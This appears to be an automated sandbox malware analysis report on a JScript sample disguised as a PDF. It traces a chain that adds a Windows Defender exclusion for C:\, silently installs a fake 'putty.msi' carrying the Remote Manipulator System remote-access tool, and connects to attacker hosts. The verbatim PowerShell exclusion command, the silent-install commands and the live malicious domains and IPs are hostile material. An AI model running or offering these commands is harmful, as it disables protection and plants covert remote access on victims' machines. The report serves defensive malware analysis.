          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\msiexec.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\msiexec.exe; Process information set: NOGPFAULTERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe; Process information set: NOGPFAULTERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe; Process information set: NOGPFAULTERRORBOX
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe; System information queried: FirmwareTableInformation
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe; System information queried: FirmwareTableInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\wscript.exe; Window found: window name: WSH-Timer
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 6168
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 3575
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 7602
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 1913
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 6599
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 7701
          Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\common\VPDAgent.exe
          Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\unidrv_rppd.dll
          Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\msvcr120.dll
          Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\common\emf2pdf.dll
          Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\webmmux.dll
          Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\unidrvui_rppd.dll
          Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Windows\Installer\{65007958-166B-4F52-87F6-0C61CE20EB5C}\ARPPRODUCTICON.exe
          Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rppdpm.dll
          Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\unires_vpd.dll
          Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Windows\Installer\{65007958-166B-4F52-87F6-0C61CE20EB5C}\server_config_C8E9A92497A149D695F92E4E3AE550F0.exe
          Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\msvcr120.dll
          Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rppdui.dll
          Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\setupdrv.exe
          Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\vccorlib120.dll
          Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\unidrv_rppd.dll
          Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Windows\Installer\MSI44FB.tmp
          Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\webmvorbisencoder.dll
          Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\common\vpd_sdk.dll
          Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\vccorlib120.dll
          Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\common\progressbar.exe
          Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\setupdrv.exe
          Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rppdpm.dll
          Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\common\fwproc.exe
          Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\common\MessageBox.exe
          Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\msvcp120.dll
          Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\libcodec32.dll
          Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\eventmsg.dll
          Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\common\properties.exe
          Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\vp8decoder.dll
          Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\webmvorbisdecoder.dll
          Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Windows\Installer\{65007958-166B-4F52-87F6-0C61CE20EB5C}\UNINST_Uninstall_R_3B1E3C8B7D0945898DA82CEEED02F0C7.exe
          Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Windows\Installer\{65007958-166B-4F52-87F6-0C61CE20EB5C}\server_stop_27D7873393984316BEA10FB36BB4D2F9.exe
          Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\unidrvui_rppd.dll
          Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\common\vpdisp.exe
          Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\unires_vpd.dll
          Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\common\pdfout.dll
          Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\common\srvinst.exe
          Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\msvcp120.dll
          Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\vp8encoder.dll
          Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Windows\Installer\{65007958-166B-4F52-87F6-0C61CE20EB5C}\server_start_C00864331B9D4391A8A26292A601EBE2.exe
          Source: C:\Windows\System32\msiexec.exe; Dropped PE file which has not been started: C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rppdui.dll
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe; Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes (graph_39-7248)
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe; API coverage: 1.9 %
          Source: C:\Windows\System32\wscript.exe TID: 1988; Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\System32\wscript.exe TID: 2572; Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\wscript.exe TID: 5932; Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\wscript.exe TID: 1940; Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2976; Thread sleep time: -4611686018427385s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5340; Thread sleep count: 7602 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5340; Thread sleep count: 1913 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3960; Thread sleep time: -3689348814741908s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4056; Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5000; Thread sleep count: 6599 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6080; Thread sleep time: -4611686018427385s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3264; Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3652; Thread sleep time: -3689348814741908s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8156; Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe TID: 4264; Thread sleep time: -50000s >= -30000s
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe TID: 8164; Thread sleep time: -240000s >= -30000s
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe TID: 940; Thread sleep count: 166 > 30
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe TID: 2820; Thread sleep time: -60000s >= -30000s
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe TID: 3944; Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe; Last function: Thread delayed
          Source: C:\Windows\System32\msiexec.exe; File Volume queried: C:\ FullSizeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeThread delayed: delay time: 50000
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeThread delayed: delay time: 60000
          Source: wscript.exe, 00000005.00000003.2370423996.0000022F3B2D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWneron Bar Animation TargetLocal\Microsoft\Windows\INetCache
          Source: wscript.exe, 00000005.00000003.2369369070.0000022F40537000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2370718080.0000022F40537000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: wscript.exe, 00000005.00000003.2368148330.0000022F404D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /start

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\System32\wscript.exeNetwork Connect: 217.21.85.207 443
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://floatnightlife.com/pdf.pdf?sn=22
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Roaming\putty.msi" /qn
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\putty.msi" /qn
          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /silentinstall
          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" -firewall
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeCode function: 39_2_6B2CFC20 GetSystemTimeAsFileTime,39_2_6B2CFC20
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Windows\System32\msiexec.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD Blob
          Source: Yara matchFile source: 39.0.rfusclient.exe.bb0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000027.00000000.2412845653.00000000015F6000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
          Source: Yara matchFile source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe, type: DROPPED
          Source: Yara matchFile source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe, type: DROPPED
          MITRE ATT&CK Matrix (one line per tactic column, cells listed in the report's row order; the digits preceding a technique are the report's numeric badges for that cell)

          Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
          Resource Development: 32 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
          Initial Access: 1 Replication Through Removable Media; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
          Execution: 1 Native API; 1 Exploitation for Client Execution; 2 Command and Scripting Interpreter; 1 PowerShell; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
          Persistence: 32 Scripting; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
          Privilege Escalation: 1 DLL Side-Loading; 111 Process Injection; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
          Defense Evasion: 12 Disable or Modify Tools; 14 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 1 File Deletion; 122 Masquerading; 1 Modify Registry; 121 Virtualization/Sandbox Evasion; 111 Process Injection
          Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
          Discovery: 1 System Time Discovery; 11 Peripheral Device Discovery; 2 File and Directory Discovery; 34 System Information Discovery; 1 Query Registry; 11 Security Software Discovery; 1 Process Discovery; 121 Virtualization/Sandbox Evasion; 1 Application Window Discovery
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
          Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
          Command and Control: 1 Ingress Tool Transfer; 21 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 3 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
          Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
          Behavior Graph (ID: 1631720; Sample: U0443.pdf.js; Startdate: 07/03/2025; Architecture: WINDOWS; Score: 100), rendered as a process tree:

          Start
            DNS/IP: floatnightlife.com
            Signatures: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; JavaScript source code contains functionality to generate code involving a shell, file or stream; 6 other signatures
            Started: wscript.exe; msiexec.exe; rutserv.exe; 2 other processes

          wscript.exe
            Signatures: JScript performs obfuscated calls to suspicious functions; Wscript starts Powershell (via cmd or directly); Windows Scripting host queries suspicious COM object (likely to drop second stage); 2 other signatures
            Started: four child wscript.exe instances
              wscript.exe (child 1)
                DNS/IP: floatnightlife.com 217.21.85.207, 443, 49691, 49692 IPPLANET-ASIL United Kingdom
                Signatures: Wscript starts Powershell (via cmd or directly); Adds a directory exclusion to Windows Defender
                Started: chrome.exe; powershell.exe
                  chrome.exe
                    DNS/IP: 192.168.2.5, 443, 49675, 49690 unknown unknown; 192.168.2.11 unknown unknown
                    Started: two chrome.exe instances; the first of them resolves floatnightlife.com and www.google.com 142.250.186.132, 443, 49702, 49707 GOOGLEUS United States
                  powershell.exe
                    Signature: Loading BitLocker PowerShell Module
                    Started: conhost.exe
              wscript.exe (child 2)
                Signature: System process connects to network (likely due to code injection or exploit)
                Started: powershell.exe (which starts conhost.exe); chrome.exe
              wscript.exe (child 3)
                Dropped: C:\Users\user\AppData\Roaming\putty.msi, Composite
                Started: powershell.exe (which starts conhost.exe); 2 other processes (which start conhost.exe and msiexec.exe)
              wscript.exe (child 4)
                Started: powershell.exe (which starts conhost.exe); chrome.exe

          msiexec.exe
            Dropped: C:\Program Files (x86)\...\rutserv.exe, PE32; C:\Program Files (x86)\...\rfusclient.exe, PE32; server_stop_27D787...EA10FB36BB4D2F9.exe, PE32; 41 other files (none is malicious)
            Started: rfusclient.exe; rutserv.exe; 3 other processes

          rutserv.exe
            DNS/IP: 194.180.158.11 MIVOCLOUDMD unknown; 5.181.158.121 MIVOCLOUDMD Moldova Republic of
            Signature: Query firmware table information (likely to detect VMs)
            Started: rfusclient.exe; 2 other processes
              rfusclient.exe
                Signature: Query firmware table information (likely to detect VMs)
                Started: rfusclient.exe
                  rfusclient.exe
                    Signature: Query firmware table information (likely to detect VMs)

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.